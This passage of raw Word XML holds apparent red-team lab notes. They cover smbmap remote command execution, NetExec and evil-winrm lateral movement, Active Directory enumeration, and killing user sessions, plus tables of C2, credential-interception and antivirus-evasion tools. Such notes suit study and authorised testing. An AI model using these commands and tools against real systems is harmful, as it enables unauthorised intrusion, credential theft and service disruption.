      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -H &lt;target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5297881D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- To scan with User and Password </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -H &lt;target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>&gt; -u {USER} -p {PASS}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A4D92CF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- To list shares and permissions in share: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -H {IP} -u {USER} -r {SHARE}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D05D39C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- Command execution if allowed: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smbmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -H &lt;target-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>&gt; -u admin -p password -x "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>whoami</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5393DB4A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6A509AFE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Using evil-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3156FECE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7179FA54" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>NetExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6F854C05" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>This tool is for Post-enumeration and later movement | for post credential steps</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C23E0C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- For Enumeration: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nxc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> {Proto} 10.0.1.254</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D3314C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- {Proto} can be: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>winrm</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>wmi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>vnc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>rdp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> ssh </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>smb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>mssql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nfs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> ftp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E16E968" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="1005087C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2C233E63" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="5F1D1E6D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Post Domain </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Cotroller</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Explotation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B2519DB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Commands to run to get Info </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="595DD3BA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Commands to list all users | Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ADUser</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -Filter *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F90796F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t>- Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>CimInstance</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ClassName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> Win32_LoggedOnUser | Get-Process -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>IncludeUserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> | Select-Object </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>UserName</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="648F829F" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>qwinsta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> | Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>RDUserSession</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7092EBCB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F6CC960" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Post Windows Exploit Tools (PURE ANARCHY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B7640D1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>qwinsta</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> -&gt; query user -&gt; logoff {USER_ID}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22A15CB5" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="236E49DF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="5914B9BD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">Seeing who is logged into a session in Linux  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B267DAD" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- who</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB00C8B" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- The who command lists currently </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>loggedâ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>€‘in users with details like terminal, login time, and remote host.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DE2144" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- w</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EAEEF57" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- The w command adds more detail, including idle time, CPU usage, and the command running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5820BAF0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- users</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB07D53" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- A quick command to list only usernames of active sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FC4C7D2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- who -u</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B32A812" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- Shows usernames, terminals, login times, and PIDs (process IDs) of active sessions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016679C8" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="535AACD2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>To Log off users in Kali</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A4D2D9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t>- You can then kill a specific session with its PID:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4639BCFA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="006133B2">
        <w:tab/>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> kill -9 &lt;PID&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30139D1C" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="7B7F104A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="54A0CDE9" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="38083431" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="2DC71FC2" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Tool purpose alignment:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1A14CA" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>TO FIND EXTERNAL TOOLS GO TO: ~/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>redteam</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>-tools</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429C75E1" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="0763132E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Tool                    Best Use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EE38866" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>theHarvester</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">            External OSINT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F4B633" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">dig / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>nslookup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">          Internal DNS recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFEBA30" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ldap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> queries            AD enumeration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3639A06D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">              AD relationship mapping</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BCC3908" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>Kerberos-based tools    Auth-focused recon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44B4D407" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="6836EE80" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| Tool         | Internal | External | Notes                                 |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E689C2A" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| ------------ | -------- | -------- | ------------------------------------- |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E3BADCF" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| Amass        | No       | Yes      | Public asset discovery                |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42879AAB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>BloodHound</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">   | Yes      | No       | AD relationship mapping               |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67455C00" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| Sliver       | Yes      | No       | Post-compromise C2                    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE74995" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>CrackMapExec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve"> | Yes      | No       | Credential-based lateral movement     |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FED450" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Hashcat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">      | Yes      | Yes      | Offline credential cracking           |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C23CC37" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ffuf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">         | No       | Yes      | Web attack surface discovery          |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="645E3AF0" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| Responder    | Yes      | No       | Local network credential interception |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07E4AE" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="5FDC925E" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| Tool               | Internal Lab | External         | Both |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BE811F7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| ------------------ | ------------ | ---------------- | ---- |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01060734" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>Invokeâ</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>€‘Obfuscation | Yes          | No               | No   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4EFA87" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>AMSITrigger</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">        | Yes          | No               | No   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EE066D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">| </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006133B2">
        <w:t>ScareCrow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006133B2">
        <w:t xml:space="preserve">          | Yes          | No               | No   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7972CB" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:lastRenderedPageBreak/>
        <w:t>| Donut              | Yes          | No               | No   |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07359E81" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| LOLBAS             | Yes          | Yes (conceptual) | Yes  |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E7CA7" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2"/>
    <w:p w14:paraId="59D0D893" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
        <w:t>| Replace With              | Purpose                | Scope    |</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C116B4D" w14:textId="77777777" w:rsidR="006133B2" w:rsidRPr="006133B2" w:rsidRDefault="006133B2" w:rsidP="006133B2">
      <w:r w:rsidRPr="006133B2">
